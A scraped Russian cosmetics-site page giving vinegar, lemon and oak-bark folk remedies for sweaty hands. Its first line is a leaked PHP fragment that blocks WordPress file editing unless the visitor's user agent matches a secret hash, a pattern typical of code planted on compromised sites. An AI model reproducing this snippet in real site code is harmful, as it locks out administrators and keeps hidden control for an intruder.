if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Средства от потливости | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Рецепты средств от потливости рук

Одной из проблем кожи рук может быть повышенная потливость. Здесь поможет лечебная косметика на основе натуральных компонентов.

Одной из про­блем кожи рук может быть повы­шен­ная пот­ли­вость или в про­сто­на­ро­дье “мок­рые ладо­шки”. Здесь помо­жет лечеб­ная кос­ме­ти­ка на осно­ве нату­раль­ных компонентов.

Вот самые попу­ляр­ные рецеп­ты:

  1. Раз­ве­сти сто­ло­вую лож­ку 9-% уксу­са в 100 мл. воды. Полу­чен­ным рас­тво­ром про­ти­рать руки.
  2. В 100 мл. воды вли­ва­ет­ся ¼ часть чай­ной лож­ки сока лимо­на. Рас­твор так­же исполь­зу­ет­ся для про­ти­ра­ния рук.
  3. Мож­но про­ти­рать насто­ем коры дуба или листьев шал­фея, а мож­но даже про­сто креп­ким чаем.

А вот рецеп­ты ван­но­чек, кото­рые помо­гут решить про­бле­му мок­рых ладошек:

  1. Сто­ло­вый уксус (3 ч. л.) вли­ва­ют­ся в  литр теп­лой воды. Дер­жат руки в такой ван­ноч­ке око­ло 5 минут. От воз­дей­ствия уксу­са про­ис­хо­дит стя­ги­ва­ние пор, вслед­ствие чего умень­ша­ет­ся потливость.
  2. Сле­ду­ю­щая ван­ноч­ка так­же содер­жит в себе уксус.  Сна­ча­ла гото­вит­ся отвар из коры дуба. Для это­го чай­ная лож­ка коры зали­ва­ет­ся 2 ста­ка­на­ми кипят­ка, рас­твор сле­ду­ет про­ва­рить 10 минут, про­це­дить и влить в него сто­ло­вый уксус (2 ч. л.). дер­жать руки в этой ван­ноч­ке надо 10 минут.

И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!